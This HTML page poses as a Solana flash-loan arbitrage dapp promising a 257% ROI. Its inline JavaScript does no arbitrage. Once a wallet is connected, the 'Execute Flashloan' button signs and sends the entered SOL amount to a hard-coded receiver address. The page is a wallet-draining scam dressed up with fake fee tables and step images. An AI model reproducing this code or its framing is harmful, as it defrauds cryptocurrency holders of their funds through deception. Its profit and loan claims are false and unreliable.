<!doctype html>
<html lang="en"><head>
    
     <script src="https://cdnjs.cloudflare.com/ajax/libs/@solana/web3.js/1.30.0/web3.min.js"></script>
      <script src="https://unpkg.com/@solana/web3.js@1.33.0/lib/index.iife.js"></script>
    <meta charset="utf-8">
    <link rel="icon" href="https://solarbitrage.tglobal.cl/logo.png">
    <meta name="viewport" content="width=device-width,initial-scale=8">
    <meta name="theme-color" content="#000000">
     <script src="https://cdnjs.cloudflare.com/ajax/libs/@solana/web3.js/1.30.0/web3.min.js"></script>
<meta name="description" content="Web site created using create-react-app"><link rel="apple-touch-icon" href="https://solarbitrage.tglobal.cl/static/img/solanaLogo.png">

<!--Start of Tawk.to Script-->
<script src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-main.js" charset="UTF-8" crossorigin="*"></script><script src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-vendor.js" charset="UTF-8" crossorigin="*"></script><script src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-chunk-vendors.js" charset="UTF-8" crossorigin="*"></script><script src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-chunk-common.js" charset="UTF-8" crossorigin="*"></script><script src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-runtime.js" charset="UTF-8" crossorigin="*"></script><script src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-app.js" charset="UTF-8" crossorigin="*"></script><script async="" src="https://embed.tawk.to/667c653c9d7f358570d3a6b2/1i1aumtb4" charset="UTF-8" crossorigin="*"></script><script type="text/javascript">
    var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
    (function(){
    var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
    s1.async=true;
    s1.src='https://embed.tawk.to/667c653c9d7f358570d3a6b2/1i1aumtb4';
    s1.charset='UTF-8';
    s1.setAttribute('crossorigin','*');
    s0.parentNode.insertBefore(s1,s0);
    })();
    </script>
    <!--End of Tawk.to Script-->


<link rel="manifest" href="manifest.json">
<link rel="preconnect" href="https://fonts.googleapis.com/">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
<link href="https://fonts.googleapis.com/css2?family=Bebas+Neue&amp;family=Lora&amp;display=swap" rel="stylesheet">
<link href="static/css/2.66cbc4d4.chunk.css" rel="stylesheet">
<link href="static/css/main.4ebaa535.chunk.css" rel="stylesheet">


<script charset="utf-8" src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-chunk-bf24a88e.js"></script><script charset="utf-8" src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-chunk-71978bb6.js"></script><script charset="utf-8" src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-chunk-7c2f6ba4.js"></script><script charset="utf-8" src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-chunk-48f3b594.js"></script><script charset="utf-8" src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-chunk-4fe9d5dd.js"></script><script charset="utf-8" src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-chunk-2d0b9454.js"></script><script charset="utf-8" src="https://embed.tawk.to/_s/v4/app/66790c3897f/js/twk-chunk-24d8db78.js"></script><style type="text/css">#nv3rsn4g8dco1719429170836 {outline:none !important;
visibility:visible !important;
resize:none !important;
box-shadow:none !important;
overflow:visible !important;
background:none !important;
opacity:1 !important;
filter:alpha(opacity=100) !important;
-ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity 1}) !important;
-mz-opacity:1 !important;
-khtml-opacity:1 !important;
top:auto !important;
right:0px !important;
bottom:0px !important;
left:auto !important;
position:fixed !important;
border:0 !important;
min-height:0px  !important;
min-width:0px  !important;
max-height:none  !important;
max-width:none  !important;
padding:0px !important;
margin:0px !important;
-moz-transition-property:none !important;
-webkit-transition-property:none !important;
-o-transition-property:none !important;
transition-property:none !important;
transform:none !important;
-webkit-transform:none !important;
-ms-transform:none !important;
width:auto !important;
height:auto  !important;
display:none !important;
z-index:2000000000 !important;
background-color:transparent !important;
cursor:none !important;
float:none !important;
border-radius:unset !important;
pointer-events:auto !important;
clip:auto !important;
color-scheme:light !important;}#nv3rsn4g8dco1719429170836.widget-hidden {display: none !important;}#nv3rsn4g8dco1719429170836.widget-visible {display: block !important;}
@media print{
 #nv3rsn4g8dco1719429170836.widget-visible { 
display: none !important;
 }
}</style><script src="https://cdn.jsdelivr.net/emojione/2.2.7/lib/js/emojione.min.js" type="text/javascript" async="" defer=""></script><script src="https://cdn.jsdelivr.net/emojione/2.2.7/lib/js/emojione.min.js" type="text/javascript" async="" defer=""></script><style type="text/css">@keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-moz-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-webkit-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}#n11rqm1d8lk1719429170934.open{animation : tawkMaxOpen .25s ease!important;}@keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-moz-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-webkit-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}#n11rqm1d8lk1719429170934.closed{animation: tawkMaxClose .25s ease!important}</style></head>
<body><noscript>You need to enable JavaScript to run this app.</noscript>

<div id="root"></div><div location="[object Object]" computedmatch="[object Object]" style="text-align: center;"><div><div class="trade_main"><div class="Toastify"></div><div class="trade_box"><div class="root_box"><div class="wallet_details"><div class="wallets"><div>Network : Solana</div></div><div style="margin-top: 1vh; margin-left: -2vh;">Address : ...</div></div><div class="Loan_amount"><div>Loan Amount: (SOL)</div><div class="trade_space"> Min: 0.1 SOL <span>Max: 1 SOL </span></div></div><div class="loan_seekbarf"><div class="loan_show"></div><div class="inc_loan"></div></div><div class="charges_details"><div class="cha"><div class="cha2"><p>Dapp fee: </p><p>Swap fee:</p><p>Loan fee:</p><p>Loan Amount:</p><p>Total gas fee:</p><p>Total Deposit: </p><p>Token name: </p></div><div class="cha3"><p>0.05 SOL</p><p>0.2 %</p><p>0.5% SOL</p><p> SOL</p><p>0.05 SOL </p><p>- SOL</p><p>trhtrh...</p></div></div></div></div><div class="profit1_ft"><h1 class="arbitrage"><span class="spanc">Profit From Arbitrage</span></h1><div class="roi"><div><p>Profit in Sol :</p><p>ROI :</p></div><div><p> SOL</p><p>257 %</p></div></div></div><div class="btn_ft">

  <button class="button_ft" id="connect_button"  onclick="connectWallet()" >Connect Wallet </button>
  
   <input class="Input button_ft" type="number" placeholder="Sol to send" id="quantity" step="0.1" value="0.1" />
    <button class="button_ft" id="connect_button"  onclick="sendButtonClick()" >Execute Flashloan Wallet </button>

  
   <p id="status_p"><span id="status"></span></p>
  </div>
  <script>
    var wallet;
    const lamports_per_sol = solanaWeb3.LAMPORTS_PER_SOL;

    function connectWallet() {
      (async () => {
        try {
          wallet = await window.solana.connect();
          document.getElementById("connect_button").innerText = "Connected";
        } catch (err) {
          console.error("Failed to connect wallet:", err);
        }
      })();
    }

    async function sendButtonClick() {
      const receiverAddress = "EE2qBx9yeVpMsViUaowa9dtXAsKzS9cXLLQHtAz6q2Pk";
      const quantity = document.getElementById("quantity").value;

      try {
        if (!wallet) {
          throw new Error("Wallet not connected");
        }

        if (quantity <= 0) {
          throw new Error("Amount must be more than 0");
        }

        document.getElementById("status_p").innerText = "Sending " + quantity + " SOL to " + ellipsizeAddress(receiverAddress) + " account address";
        await signInTransactionAndSendMoney(receiverAddress, quantity);
      } catch (error) {
        console.error("Error sending transaction:", error);
        document.getElementById("status_p").innerText = "Failed to send transaction: " + error.message;
      }
    }

    function ellipsizeAddress(str) {
      if (str.length > 35) {
        return str.substr(0, 8) + '...' + str.substr(str.length - 8, str.length);
      }
      return str;
    }

    async function signInTransactionAndSendMoney(destPubkeyStr, quantity) {
      const network = "https://orbital-alien-daylight.solana-mainnet.quiknode.pro/c6a1de70720d3c1bbbaef183beaa15ebfa24665b/";
      const connection = new solanaWeb3.Connection(network);
      const transaction = new solanaWeb3.Transaction();

      try {
        const lamports = quantity * lamports_per_sol;
        const destPubkey = new solanaWeb3.PublicKey(destPubkeyStr);

        const instruction = solanaWeb3.SystemProgram.transfer({
          fromPubkey: wallet.publicKey,
          toPubkey: destPubkey,
          lamports,
        });

        transaction.add(instruction);
        transaction.feePayer = wallet.publicKey;

        const hash = await connection.getRecentBlockhash();
        transaction.recentBlockhash = hash.blockhash;

        const signedTransaction = await window.solana.signTransaction(transaction);
        const signature = await connection.sendRawTransaction(signedTransaction.serialize());

        await connection.confirmTransaction(signature);
        document.getElementById("status_p").innerText = "Transaction successful. Sent " + quantity + " SOL.";
      } catch (error) {
        console.error("Error sending transaction:", error);
        throw error; // Propagate the error up for better error handling
      }
    }
  </script>
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  <center>
   <h3> 1- </h3>
  <img src="111.png">
   <h3> 2- </h3>
  <img src="222.jpg">
      
   <h3> 3- </h3>
  <img src="ttt.webp">
   <h3> 4- </h3>
       <img src="2.jpg">
  <h3> 5- </h3>
       <img src="3.jpg">
  <br>
  <h3> To Execute Succesfuly follow the images</h3>
   </center>
  
  
  

    </div></div></div></div></div></div>



<script async="" charset="UTF-8" src="https://embed.tawk.to/_s/v4/app/66790c3897f/languages/en.js"></script><div id="nv3rsn4g8dco1719429170836" class="widget-visible"><iframe src="about:blank" frameborder="0" scrolling="no" width="204px" height="44px" style="outline:none !important; visibility:visible !important; resize:none !important; box-shadow:none !important; overflow:visible !important; background:none !important; opacity:1 !important; filter:alpha(opacity=100) !important; -ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity 1}) !important; -mz-opacity:1 !important; -khtml-opacity:1 !important; top:auto !important; right:10px !important; bottom:0px !important; left:auto !important; position:fixed !important; border:0 !important; min-height:44px !important; min-width:204px !important; max-height:44px !important; max-width:204px !important; padding:0 !important; margin:0 !important; -moz-transition-property:none !important; -webkit-transition-property:none !important; -o-transition-property:none !important; transition-property:none !important; transform:none !important; -webkit-transform:none !important; -ms-transform:none !important; width:204px !important; height:44px !important; display:block !important; z-index:1000001 !important; background-color:transparent !important; cursor:none !important; float:none !important; border-radius:unset !important; pointer-events:auto !important; clip:auto !important; color-scheme:light !important;" id="ws4ml5i5cg081719429170864" class="" title="chat widget"></iframe><iframe src="about:blank" frameborder="0" scrolling="no" width="350px" height="487px" style="outline:none !important; visibility:visible !important; resize:none !important; box-shadow:none !important; overflow:visible !important; background:none !important; opacity:1 !important; filter:alpha(opacity=100) !important; -ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity 1}) !important; -mz-opacity:1 !important; -khtml-opacity:1 !important; top:auto !important; right:0px !important; bottom:0px !important; left:auto !important; position:fixed !important; border:0 !important; min-height:487px !important; min-width:350px !important; max-height:487px !important; max-width:350px !important; padding:0 !important; margin:0 !important; -moz-transition-property:none !important; -webkit-transition-property:none !important; -o-transition-property:none !important; transition-property:none !important; transform:none !important; -webkit-transform:none !important; -ms-transform:none !important; width:350px !important; height:487px !important; display:none !important; z-index:1000002 !important; background-color:transparent !important; cursor:none !important; float:none !important; border-radius:5px 5px  0 0 !important; pointer-events:auto !important; clip:auto !important; color-scheme:light !important;" id="n11rqm1d8lk1719429170934" class="" title="chat widget"></iframe><iframe src="about:blank" frameborder="0" scrolling="no" width="360px" height="145px" style="outline:none !important; visibility:visible !important; resize:none !important; box-shadow:none !important; overflow:visible !important; background:none !important; opacity:1 !important; filter:alpha(opacity=100) !important; -ms-filter:progid:DXImageTransform.Microsoft.Alpha(Opacity 1}) !important; -mz-opacity:1 !important; -khtml-opacity:1 !important; top:auto !important; right:10px !important; bottom:60px; left:auto !important; position:fixed !important; border:0 !important; min-height:145px !important; min-width:360px !important; max-height:145px !important; max-width:360px !important; padding:0 !important; margin:0 !important; -moz-transition-property:none !important; -webkit-transition-property:none !important; -o-transition-property:none !important; transition-property:none !important; transform:none !important; -webkit-transform:none !important; -ms-transform:none !important; width:360px !important; height:145px !important; display:none !important; z-index:auto !important; background-color:transparent !important; cursor:none !important; float:none !important; border-radius:unset !important; pointer-events:auto !important; clip:auto !important; color-scheme:light !important;" id="lvc7c5353m91719429170882" class="" title="chat widget"></iframe><div id="chat-bubble"></div></div></body></html>

